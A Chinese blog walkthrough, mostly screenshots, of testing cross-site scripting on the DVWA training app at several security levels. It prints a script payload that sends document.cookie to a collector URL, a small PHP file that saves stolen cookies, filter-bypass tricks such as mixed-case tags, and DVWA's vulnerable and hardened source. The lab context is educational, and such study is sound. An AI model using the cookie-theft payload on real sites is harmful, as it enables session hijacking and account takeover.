![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDAyMjI3NC0xNDk2NzI5NTQ1LnBuZw%3D%3D.png?w=700&webp=1)
其中:
XSS (DOM) : DOM型XSS漏洞
XSS (Reflected) : 反射性XSS漏洞
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDA0NTgzNi0xMzc5ODcxMzcxLnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDA1NjEzNC0yODQyMDc1OTAucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDE1OTY2Ny00NDQ3OTgzMzkucG5n.png?w=700&webp=1)
我们接着来输入<xss> ,点击确定
这时发现插入html标签的话,页面会发生变化,我们尝试js弹窗
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDI1NDEyNy0yMDA4MTI1OTg3LnBuZw%3D%3D.png?w=700&webp=1)
这时说明这个网站可以进行XSS攻击,我们输入 <script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie</script> ,就可以得到要攻击的人cookie信息
<?php
$cookie = $_GET['cookie'];
file_put_contents('cookie.txt',$cookie)
?>
http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDQxNTUyNS05MDU3OTU1NzUucG5n.png?w=700&webp=1)
4.完成后,我们直接访问index.php,发现我们已经已被攻击者的身份登陆,可以赶我们想干的事情了
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDQzNTQyMy0xNjY0MzUzMjI2LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDQ0NDM0Mi0xOTk0NjU2Nzk3LnBuZw%3D%3D.png?w=700&webp=1)
我们先来输入<script>alert('xss')</script> ,点击确定
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDQ1NzkxNS0xNTMyMjA3NTk0LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDUyOTQzOC01ODgwMzUzNTkucG5n.png?w=700&webp=1)
2. <ScRiPt> 大小写混合绕过
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDU0Mjc1Mi0xNjE0NDEyMjQxLnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDYwMzgxMy0yMzIyNDYxNDgucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDYxNDQ1MC0yNDE3MzkwODYucG5n.png?w=700&webp=1)
我们先来输入<script>alert('xss')</script> ,点击确定
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDYyNTIxMi04MjMxMjI2OTcucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDY1MjYyOC0xOTk1MzIyNDkucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDcwMzMyOC05NTcxOTk5MzQucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDcyMDg2Ni0xMDU2MzA4MzQucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDczNTM4MC0yMDY4MDYyODAzLnBuZw%3D%3D.png?w=700&webp=1)
我们先来输入<script>alert('xss')</script> ,点击确定
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDc1NDA1OS0xMzU4MzUwNjY1LnBuZw%3D%3D.png?w=700&webp=1)
发现代码原封不动的输出出来了,我们通过fire bug 查看元素
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDgwNDI1MC0xMTk2Mjc2NjIyLnBuZw%3D%3D.png?w=700&webp=1)
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input
$name = htmlspecialchars( $_GET[ 'name' ] ); // Feedback for end user
$html .= "<pre>Hello ${name}</pre>";
} // Generate Anti-CSRF token
generateSessionToken();
?>
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDg0MTYxMC0xMTg3MTI0Njk1LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDg1ODAxOS0xODY2MDk3MzI2LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDkwNzE3My0xMTg2MTUwODc5LnBuZw%3D%3D.png?w=700&webp=1)
是留言板性质的
我们先来尝试输入
发现输入不完整,估计是后台的输入框限制了长度
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDk0NTk4OC0yODc0NTY4NzIucG5n.png?w=700&webp=1)
果然不出所料
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTAwNDUxOC0yMTE1NjcyNjQ0LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTAxNjk1MS0yMDY3Nzk3Njk5LnBuZw%3D%3D.png?w=700&webp=1)
然后改包:
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTAzNDk3MS0xNjg2MzI1MjkzLnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTExNDc5MC05MjMzODcyNDQucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTEyNjE0NS0xNDIwODc0MzkxLnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTE0NDkwNi0xODMwNjYwMjc2LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTE1MzU5NS01NjE1Nzc0NTYucG5n.png?w=700&webp=1)
我们发现name中还是限制了字数,但在Low等级中我们已经列出解决办法,这里不再赘述
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTIxNjQ0Ni0xNzE4OTgwMTkucG5n.png?w=700&webp=1)
发现<script>标签被过滤,此处我们也已经列出过解决办法,也不再赘述
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] ); // Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message ); // Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); //mysql_close();
}
?>
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTIzMjAwMi0xNzA5NDY3OTcyLnBuZw%3D%3D.png?w=700&webp=1)
点击确定后
我们在Message处尝试输入<script>alert('xss')</script>
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTI1NzQwOC0zNjI1MjY4MjIucG5n.png?w=700&webp=1)
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] ); // Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message ); // Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); //mysql_close();
}
?>
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTMxOTU0OC0zMjExOTQ3Ny5wbmc%3D.png?w=700&webp=1)
这时我们先来看代码
<?php if( isset( $_POST[ 'btnSign' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] ); // Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message ); // Sanitize name input
$name = stripslashes( $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$name = htmlspecialchars( $name ); // Update database
$data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
$data->bindParam( ':message', $message, PDO::PARAM_STR );
$data->bindParam( ':name', $name, PDO::PARAM_STR );
$data->execute();
} // Generate Anti-CSRF token
generateSessionToken();
?>
- \x00
- \n
- \r
- \
- '
- "
- \x1a